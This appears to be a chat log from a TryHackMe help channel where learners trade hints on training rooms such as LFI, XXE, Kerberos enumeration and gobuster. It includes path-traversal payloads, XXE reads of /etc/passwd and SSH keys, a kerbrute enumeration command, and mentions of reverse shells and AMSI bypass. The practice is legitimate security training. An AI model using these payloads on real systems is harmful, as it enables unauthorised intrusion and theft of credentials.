never got an answer... it drove me literally insane
it's out of scope but it supposed to be vulnerable.
Antivirus, perhaps. It's still a mystery to me
it could be Antivirus... dunno
yes I found login page
Hey, I totally understand that. It's been over 4 hours that I've been trying real hard to figure out what the fuck is going on and yeah It is really driving me insane. I just decided to opt out to the port 49664 the smb share mirroring and execute the aspx payload.
yeah, some boxes (unless you're an expert) you just have to stay in scope and do more research.
it finally made sense in another room, where i tried to RCE myself a shell and i actually witnessed the AV warning. It was also out-of-scope.
.
I can't say for sure. Maybe try getting RDP and then run the exploit again, see if AV flags it, so you're not totally blind
lassi pointed me to "amsi bypass". still haven't gotten around to trying it.
that's something i haven't found on thm tho, so you might have to look elsewhere
this one has it too but it's pretty advanced/complex stuff
https://tryhackme.com/room/runtimedetectionevasion
knew I saw it in another room
Man it is totally possible that AV is messing things up. I will try get a foothold first and check on the defender and AV. Thanks for lighting my mind up. I was just completely clueless & pissed lol
Gave +1 Rep to @trim badger
Hello i am really struggling with a the
"Why are NULL, FIN and Xmas scans generally used?" question in task 8 of the nMap room i feel like i just mess up the typing or something dumb like that but i spent over half an hour on this single question and just want to progress.🥲 😅 Can someone tell me where to look or something?
In this text.
oke i will have a look again thank you. lets hope i won't be back in half an hour xD
||Paragraph 3 ||
i found it thanks 🙂 I was trying so many ways of typing "are used primarily as they tend to be even stealthier" xD @lucid junco
Oi, Robocop, where is my rep.
The number of * is a clue to how long the answer is.
+rep @lucid junco
Gave +1 Rep to @lucid junco
hi I need a hint for challenge 2 of LFI room
in last section
I found that I can see file content preview by modifying value of cookie
what have you tried so far???
because to shadow it sounds like you should already have all the info and knowledge of what to do to get said flag
I am just modifying value box and putting in things like ..//etc//flag2
so I'm playing around with file previews
why the double slashes???
I tried both with and without double slashes
you might need to jump up more than just a single dir too
I am doing that
I just jumped three directories and its still not letting me
do I just play around with the directories?
I got it
I found it
nevermind
lol
thanks
I think I just need to get my head in the right direction
once I get my brain going I should be fine
lol I'm glad there's a community like this one
ok
yeah it is great isn't it
ya
I am having trouble with challenge 3. Lol, LFIs are hard.
could you please give me a hint as to I researched $_REQUEST which turns out to be a way to take HTML input
I tried inserting $_REQUEST[../../../etc/flag] into input box
I also tried going into inspector and modifying the GET request in the form to see if I could get the flag
it turns out that I get an error message:
could someone give me a hint without giving me the answer?
I tried using quotations in the $_REQUEST['../../../etc/flag3']
am I overthinking it?
I used curl with POST request. Can you try the same?
Can I get a hint for Severity 9 - Lab in OWASP top 10? I've spent over one hour just searching for random stuff on exploitDB and have found nothing that can remotely work
See the source code? And navigate through links?
I mean, I see that there's an admin.php page that accepts in a form. My guess is that I'm maybe supposed to inject something through that form?
I can also see jquery-2.1.4 is used, but exploitDB shows nothing for that specific version
see the source code of || login|| and i think you will have your answer
login.php? Hmm, that webpage doesn't exist
It's the Severity 9 - Lab (the one with the online bookstore)
https://tryhackme.com/room/owasptop10 this room right?
Yes, task 29
there is an exploit available on exploit db for unauthenticated RCE and i have checked it just now.
How were you able to find it? That's all I need 😅
I don't know what information I was supposed to find out by browsing the website to enter into exploitDB
i used simple term bookstore unauthenticated rce on google
What led you to add "unauthenticated rce" to that search?
I mean, of all exploits, why that one specifically
there is only one exploit for RCE i think for bookstore
Oh.. I see.. searching for "bookstore" on exploitDB yields almost no results.. searching for "book store" yields much more
Yeah, I guess it was named "Book Store" in exploitDB instead of "Bookstore"... Thanks @cold eagle
Gave +1 Rep to @cold eagle
i guess you found the right exploit?
Yes. I've managed to complete the task
Wireshark: The Basics - exercise Packet Navigation question (
Go to packet 12 and read the comments. What is the answer?)
I have the image but whats the answer lol?
#993868677600514130 and you have to scroll all the way down in the comments
I was having the same problem and just now got it. I had to right click on packet 12 and then select Packet Comment, and then scroll down. That was the only way I was able to see it.
thank you
Gave +1 Rep to @raven escarp
somebody help me in Attacktive directory Room.
this error show when using the kerbrute "Couldn't find any KDCs for realm SPOOKYSEC.LOCAL0. Please specify a Domain Controller"
command: "./kerbrute_linux_amd64 userenum -v -d spookysec.local0 /home/kali/THM/attractive\ \ directory/uname.txt"
hi guys
I saw a guy earlier said to use curl with POST request
I can try that but I will have to research it
anyone able to help me if I have issues with challenge 3 of LFI?
thanks btw
Well from your screenshot you are not even on the right page.
You can't put /etc/flag as the URL
right ok I am trying to use CURL
right now
ok
I tried putting it into the input box a while ago
I'm trying to use CURL in terminal to do it. Should my efforts be on the input box or the terminal
?
I tried $_REQUEST[/etc/flag3] and it doesn't work and I have tried all sorts of other things in the input box
Well, I think you are somewhat confused about $_REQUEST, did you google what that is?
All you have to do is using the right request method to send the data and the right payload
ok
thank you tho
I googled it it's a way of sending and accepting requests
I just have to continue to research it
I will get it eventually
do I have to do something with cookies where I save a cookie in a variable and then access the cookie via the HTML?
does this video explain well enough about $_REQUEST?
Another of the SuperGlobal Arrays in PHP is the $_REQUEST array.
This one actually combines the contents of the $_GET, $_POST, and $_COOKIE arrays.
Because there is a risk of values being overwritten, there is a directive in the php.ini file called request_order that lets you control the order that these values will be added to the $_REQUEST arr...
No it's nothing about cookies for that task
Well it's not that complicated, so I guess that video is explaining it good enough, but I'm not going to watch the video now to confirm 😄
ok
I am gonna keep going then
its something I can type in input box right?
and do I have to modify HTML in inspect element?
because those are the other things I have been doing
I have been trying typing into input box $_REQUEST[....////....////....////etc////flag3%00]
and its still not working
I also tried modifying HTML to include PHP code to get the $_REQUEST[/etc/flag3]
among other things in those categories
seems you are going down rabbit holes
I also tried echo $_REQUEST[../../../etc/flag3]
don't give me the answer but I am thinking that I am overthinking it?
I know I will solve it eventually
yeah definitely over thinking it right now
ok
I'm somewhat confused why you always write it like that $_REQUEST[../../../etc/flag3] ?
Could you show a screenshot of that?
The $_REQUEST part is something server side, so it's nothing you have to supply.
Your part is to send your payload with the right request method.
ok
ok
so hold on
in the URL bar after the ? I type echo $_GET[../../../etc/flag3%00]
am I getting closer
I get no errors in this case but no file preview
no matter how many dotdotslashes I use it does same thing
I know $_REQUEST accepts GET and POST and COOKIE requests
all in one
am I misunderstanding it?
No, you need to understand how data is being sent via a GET request and via a POST request and how the server retrieves that.
E.g. Task 4 shows you how the server side code would look like to retrieve the data sent via a GET request where the parameter name is "lang".
So your $_GET is again something server side
ok
ok I will read that
Ok I am gonna research that
I researched it a little bit and tried using a php wrapper and ended up with this error:
I'm gonna keep trying different wrappers
but thanks
ok
Room: Evading Logging and Monitoring, Task 10 any help ? i run the script from the desktop and then i clear the logs from the Event Viewer but i get :: Traffic halted, you got caught
Guys I need help on windows priv escalation room : https://tryhackme.com/room/windowsprivesc20 for task 7 - Abusing vulnerable software. I am not able to add pwnd user in administrator group although tried to change the payload in the exploit
hello im doing the rootme room, when i upload my reverse shell file the file wont load and the fire fox says "The connection was reset" is this becouse the website blocks the reverse shell or is something wrong with my vpn/internet settings.
what vpn are you using
got fixed had to change the mtu..
Hi everyone does any know if we are suppose to be able to access /data on the fortress box. It seems strange as the flags are listed inside
hi, I know that $_REQUEST is an array of cookies, POST requests, and GET requests
so do I need to use all three of those to solve the LFI challenge 3?
or which one of those should I focus on
I had to change request to POST request and POST ../../../etc/flag1 in the input box
ok
so I should modify it to POST request but do I need to modify a cookie as well?
nudges. ok. I am gonna keep going
thanks for the encouragement
I will keep going until I get it
thanks
If I'm stuck on LFI, is it worth it to go onto the next vulnerability and come back to LFI later?
I think that would make sense.
I can do SSRF without knowing LFI right?
I am in command panel "Pickle Rick room"
Is I'm closer
Hello, oh, I m new and I wanted to have some experience in the field of hacking, is there anyone to help me?
Closer to foothold
how I establish reverse connection
See which commands you are allowed to run.
Anyone able to give me a nudge on lookingglass?
Where are you stuck?
The port scanning. when i connect w ssh to any port i get no matching host prints or smth
Is that the part the says Higher/lower?
I dont see any of that haha
i get that fingerprint error
no matching host fingerprint or smth
What's your nmap syntax?
What out output did -sS -p- give you?
-sS -sV -p 0,1023 for scanning srvices
What output did -sS -p- give you?
hey I want some hint regarding MITRE room, task 3, last 2 ques. I can't find with which group Hikit is slightly overlaps?
I'm in the year of the dog room.
:-; guys any hints on how to bypass the filters for '<' ,etc for uploading reverse shell payload
not done that room but you can probably use the normal pipe char right???
i didnt get what ur trying to say. I tried converting into hex, It didn't work.
somecommand here | a command that saves it as a file
where do i pipe it from
lemee see. the php code uses strstr for the check so I cannot directly pass text through
but shadow dunno if you have basic command execution on the box or not already
lassi can probably help better
also if you want someone to blame for making the room too hard think this is one of muiri:s rooms
the worst part is I tried I couldn't get it to execute any commands but could load files and create em. kinda weak at sql. I tried using smb but idk i couldn't get it to work today.
yea
If only I could execute curl. lemme see.
huhhhhhhhhh, kinda feeling like a stupid. now. wow. I tried earlier converting to hex. It didn't work. Now it works. 0-0
Any hints on the 2 last challenges on room Password Attacks?
In the Anthem Room CTF - Task 2: How did you inspect the pages to identify Flag 1 ?
Curl the meta data.
Thanks @lucid junco I have not used much. I will read up 🙂
Gave +1 Rep to @lucid junco
Burpsuite - Intruder - Task 10. Don't really need any help here. I'm wondering why success and fail have different sizes? What type of contents do they return?
do a fun test and visit one of the failed pages and then visit one of the successfully found pages
then count the lines of text
Oh wow... That's really simple.. Thanks 😄
Gave +1 Rep to @alpine kestrel
no problem and also probably makes it very clear why it works that way..
Heydee oh o/
Not sure if I'm in the right place to ask for this but I'm doing the Web enumeration's room and start to learn how to use gobuster. I was wondering something about files enumeration : does the -x flag must have specifics extensions called or is there a way to ask for enumerating any files in the specified directory ? (like using .* or something like that).
Thanks in advance for your time.
Yes, ok, I think I understand now. I'm trying to use gobuster like if I was on my own hard drive launching a simple ls command...but that's not how it works.
One more time (and certainly not the last 😁 ), thanks for your answer 👍
Gave +1 Rep to @burnt rivet
hi do I need LFI in order to do SSRF?
I'm thinking of coming back to LFI later
because I got stuck
I'm thinking of doing SSRF and some other challenges and then going back and doing LFI
yes SSRF is going good
I will get back to LFI/RFI when I complete rest of web fundamentals path
ok
cool
I'm gonna do other web fundamentals and get back to LFI
I think I just need to take a break from LFI and then redo it
Hmm, 🤪 any hints for alice. :-; I'm into humptydumpty account and I'm lost. I tried creating a dictionary out of the text and use hydra. but idk
in the looking glass room
nvm i got in 😮
hlo hackers
I am in "Kenobi Room"
when I mount /var directory it does not show kenobi's private key
nice 🙂
I check all the directories but doesn't show private key
how do i get in
ah man, you edited it the joke is lost now
haaaahhh
can you show the command you used for mounting?
I have successfully mounted
I think you should try this room

he is done with the room
sorry, you've no idea how funny that is
@tardy tapir i hope you did this?
Hi there, I've got another question about Gobuster, just to understand how it works : I noticed that between a directory enumeration and file extension with only one extension after the -x flag, the number of the keyword for the search is doubled. Is it because gobuster look for "word_from_list.my_extension" and "**.**word_from_list.my_extension" ? (for the hidden ones)
In the room, it's shown using -x.txt,.php etc. But I think it's even, because I also tried -x txt and it works (as it's shown in the summary after launching the command with the "Extension" line).
Yes, I got that, but I was wondering why suddenly the wordlist is passed twice ?...
Because it's using the word without extension and one time with extension
Hi y'all I am stuck on MITRE engage Task 5 Question 2... I used the hint but still cannot figure out which 'resource aid' is used.
Ooooh, it's obvious now I'm reading that 🤦♂️ Thanks to you both 👍
Gave +1 Rep to @left thunder
- @burnt rivet
Gave +1 Rep to @burnt rivet
Any luck with this task?
Backup files generally have the extension .bak
Hi. I'm doing the room Hashing - Crypto 101 and I'm confused on the last question in task 2. Can anyone provide me a good source of information for this question? The question is "If you have an 8 bit hash output, how many possible hashes are there?"
In computer science, a hash collision or clash is when two pieces of data in a hash table share the same hash value. The hash value in this case is derived from a hash function which takes a data input and returns a fixed length of bits.Although hash algorithms have been created with the intent of being collision resistant, they can still someti...
2 different inputs give them same output.
need some help with the upload vulnerabilities room, last challenge. I uploaded the file while evading the filters, and scanned content on the location that keeps the files. Only gobuster gave nothing back
why are you scanning only in the content folder???
hahaha
oh thanks for that confirmation lassi.... was a while since shadow did that room so don't recall everything
Gave +1 Rep to @burnt rivet
helloooo
I'm doing owasp top 10 and am stuck at XXE
I should find the path in which ssh keys are stored from specific user by using XXE
how can I list files or can I do something similar to find out?
which task number?
task 16, 4th question
I just don't know the last part of the location
I think it is /home/<user>/.ssh/???
you have to make a payload that reads /etc/passwd
yep
yeah
so about the payloads with SYSTEM in it, I can only read the contents of the files?
and then id_rsa.pub tends to give you the username
nice, thanks!
Gave +1 Rep to @cold eagle
+rep @burnt rivet
Gave +1 Rep to @burnt rivet
Hi all! I'm stuck at phishing emails 1, email body, question 3 to convert email2 base64 data. I can't find the flag.
have you tried cyber chef???
Yes, I get some text and some gibberish, but no flag.
you are supposed to end up with a pdf file that you can open to read the flag
Tried that also and I can't open it. raw data start with %PDF and end with %%EOF
can't open it too when I keep the "ÓÝ{oV·ë.<m¾6íÎ8Ó.ôïNôïO}" as last line (looks like a flag)
might be because you got some of the base64 data wrongly
Ive tried copy all text from email2.txt -> base64 decode and open that data as pdf: it's blank but it opens. If I omit the first 4 lines of email2.txt, the base64 decoded makes more sense, but can't open it as pdf...
could be problems with new lines and stuffs
I've tried all sorts of combination, but nothing. Anyone able to reproduce the exercise to find the flag?
yeah it works if you copy out the base64 and then remove all the new lines and then use cyber chef and download the file as a .pdf
great, I'll try. Thanks a lot for your time!
no problem
Web Enumeration - Task 6 (Gobuster), question 4
I'm using the following command
gobuster vhost -u [ip] -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 64
And getting no hits.. am I supposed to be using a different wordlist here?
Oh.. okay. I'll take a look, thanks @burnt rivet
@burnt rivet this is what I'm doing already practically. How is hitting the IP different than hitting the domain here?
Oh.. yeah.. I see what the difference is when adding it to the hosts file. They are just different domains mapped to the same IP. It worked, thanks @burnt rivet
Gave +1 Rep to @burnt rivet
Hi, anyone can help me with Sandbox Evasion room? I've a problem with the check of sleep function in the DIY Sandbox Evasion Challenge step... Thx
Yes, I've used that extension on my script but nothing is coming back, even though I was manually able to find a few Internet Explorer .BAK files:
$path_to_files = get-childitem -recurse -path C:\Users *.bak | %{$_.FullName}
foreach($path_to_file in $path_to_files) {
Write-Output $path_to_file
}
Hi, I noticed something about the Rick&Morty CTF challenge room, some users got 240 pts by finding the same three ingredients as I did. Is there special thing to do to earn maximal score or it's just a matter of time spent to find them ? 🤔 I'm curious about that difference
nah, blood points aren't double they're normally +50 so if there's 30 points for one task it's total 80
I see, thanks
What if it didn't end with .bak?
Hi, i'm blanking on where to go...
I'm currently running room: OWASP Top 10
Task 11, they ask to "have a look around the webapp"...
Which webapp...? is it from the previous machine? so the machine from task 7? or am i looking for something after task 8 machine is booted?
I'm doing "Network Services", Task 4. How do I figure out who the profile belongs to?
after connecting to the smb share you can list files in it and download said interesting files to read in another terminal window and by that figure out who it belongs to
how do you download a file from the share drive?
when in the smb instance and prompt type get filename
Thanks
Gave +1 Rep to @alpine kestrel
Hi, so I just completed the room Vulnerability Capstone and I was trying to upload a reverse shell on the sites admin page since I had noticed it had a default credentials vulnerability and wasn't being successful. But then when I click on the hint button for the flag capture question it just straight up gives me an exploit to use. Just out of curiosity was that the method I was "supposed" to use or was using the hint beating the room on easy mode?
Yeah, no need to use credentials, exploit will work without creds
Thanks my dude!
Gave +1 Rep to @burnt rivet
What term best describes the side your browser renders a website?
